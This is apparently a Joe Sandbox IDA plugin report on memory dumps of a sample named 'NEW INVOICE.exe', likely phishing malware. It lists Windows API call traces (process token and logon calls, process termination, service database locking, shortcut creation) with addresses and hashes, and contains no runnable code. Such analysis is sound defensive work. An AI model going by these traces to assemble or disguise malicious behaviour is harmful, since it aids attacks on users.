                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                    • String ID:
                                                                                    • API String ID: 3275902921-0
                                                                                    • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                    • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                    • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                    • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                    • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                    • String ID:
                                                                                    • API String ID: 1413079979-0
                                                                                    • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                    • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                    • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                    • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                    APIs
                                                                                    • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                    • __calloc_crt.LIBCMT ref: 0041419B
                                                                                    • __getptd.LIBCMT ref: 004141A8
                                                                                    • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                    • __dosmaperr.LIBCMT ref: 00414201
                                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 1803633139-0
                                                                                    • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                    • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                    • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                    • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                    APIs
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                    • String ID:
                                                                                    • API String ID: 3275902921-0
                                                                                    • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                    • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                    • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                    • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                    APIs
                                                                                    • SendMessageW.USER32 ref: 004554DF
                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3691411573-0
                                                                                    • Opcode ID: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                    • Instruction ID: 46bf5c356378f1810468ef4d8dfe2f1c399e91f4bdd480ef4a2643e810f8fbb4
                                                                                    • Opcode Fuzzy Hash: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                    • Instruction Fuzzy Hash: 8B1108713047419BC710DF68DDC8B2A77A8BB14322F400A6AFD14DB2D2D778DC498769
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                    • String ID:
                                                                                    • API String ID: 1814673581-0
                                                                                    • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                    • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                    • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                    • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    • String ID:
                                                                                    • API String ID: 2833360925-0
                                                                                    • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                    • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                    • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                    • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                    APIs
                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                    • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                    • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                    • EndPath.GDI32(?), ref: 0044724E
                                                                                    • StrokePath.GDI32(?), ref: 0044725C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                    • String ID:
                                                                                    • API String ID: 372113273-0
                                                                                    • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                    • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                    • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                    • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                    APIs
                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 4278518827-0
                                                                                    • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                    • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                    • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                    • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                    • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                    • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                    • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                    • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                      • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                    • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                    • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3495660284-0
                                                                                    • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                    • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                    • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                    • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 839392675-0
                                                                                    • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                    • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                    • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                    • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\NEW INVOICE.exe,00000004), ref: 00436055
                                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                    • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                    • GetLastError.KERNEL32 ref: 00436081
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 1690418490-0
                                                                                    • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                    • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                    • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                    • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                    APIs
                                                                                      • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                    • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                    • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                    • CoUninitialize.OLE32 ref: 00475D71
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                    • String ID: .lnk$HH
                                                                                    • API String ID: 886957087-3121654589
                                                                                    • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                    • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                    • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                    • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1173514356-4108050209
                                                                                    • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                    • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                    • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                    • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
